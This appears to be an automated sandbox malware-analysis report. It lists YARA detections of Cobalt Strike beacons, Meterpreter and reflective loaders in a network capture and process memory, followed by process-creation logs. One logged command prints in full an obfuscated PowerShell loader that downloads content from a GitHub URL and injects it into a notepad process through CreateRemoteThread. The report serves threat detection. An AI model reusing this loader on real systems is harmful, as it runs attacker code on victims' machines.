        Source: sslproxydump.pcap, type: PCAPMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: sslproxydump.pcap, type: PCAPMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
        Source: sslproxydump.pcap, type: PCAPMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
        Source: sslproxydump.pcap, type: PCAPMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
        Source: sslproxydump.pcap, type: PCAPMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
        Source: sslproxydump.pcap, type: PCAPMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
        Source: sslproxydump.pcap, type: PCAPMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
        Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
        Source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, modified = 2022-12-23
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Malware_QA_vqgk date = 2016-08-29, author = Florian Roth, description = VT Research QA uploaded malware - file vqgk.dll, score = 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-12-21
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: 00000000.00000002.323735392.000001A626DEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
        Source: 00000000.00000002.323735392.000001A626DEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
        Source: 00000000.00000002.357207100.000001A635FDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
        Source: 00000000.00000002.357207100.000001A635F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
        Source: 00000000.00000002.357207100.000001A635D78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
        Source: 00000000.00000002.323735392.000001A626DA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
        Source: 00000000.00000002.323735392.000001A626DA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, modified = 2022-12-23
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Malware_QA_vqgk date = 2016-08-29, author = Florian Roth, description = VT Research QA uploaded malware - file vqgk.dll, score = 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-12-21
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-09-15
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, modified = 2022-12-23
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: Malware_QA_vqgk date = 2016-08-29, author = Florian Roth, description = VT Research QA uploaded malware - file vqgk.dll, score = 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-12-21
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9A5D40CA80_2_00007FF9A5D40CA8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9A5E1A2060_2_00007FF9A5E1A206
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function /{([int[]][char[]]$args[0]|%{[char]($_-4)})-join''};$c =/ '_HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$ZmvxyepEppsgI|,MrxTxv$e0$MrxTxv$f0$ymrx$g0$ymrx$h0$ymrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$fssp$[vmxiTvsgiwwQiqsv},MrxTxv$e0$MrxTxv$f0$f}xi_a$g0$ymrx$h0$syx$mrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$GviexiViqsxiXlvieh,MrxTxv$e0$MrxTxv$f0$ymrx$g0$MrxTxv$h0$MrxTxv$i0$ymrx$j0$syx$MrxTxv$k-?';Add-Type -Name y -names x -m $c;$h = [System.Diagnostics.Process]::GetProcessById((ps notepad).id[0]).Handle;$a = [x.y]::(/ 'ZmvxyepEppsgI|')($h, 0, 0x100000, 0x1000, 0x40);$d = (iwr github.com/john-xor/temp/blob/main/index.html?raw=true).content;$n = 0;$t = 0;[x.y]::(/ '[vmxiTvsgiwwQiqsv}')($h, $a, $d, $d.Length, [ref] $n);[x.y]::(/ 'GviexiViqsxiXlvieh')($h, 0, 0, $a, 0, 0, [ref] $t);
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9A43.tmp" "c:\Users\user\AppData\Local\Temp\h4qpy1nu\CSCE97AB74AE4304D2FB93613F88A1756.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdlineJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9A43.tmp" "c:\Users\user\AppData\Local\Temp\h4qpy1nu\CSCE97AB74AE4304D2FB93613F88A1756.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4g5snjau.br2.ps1Jump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@6/11@3/3
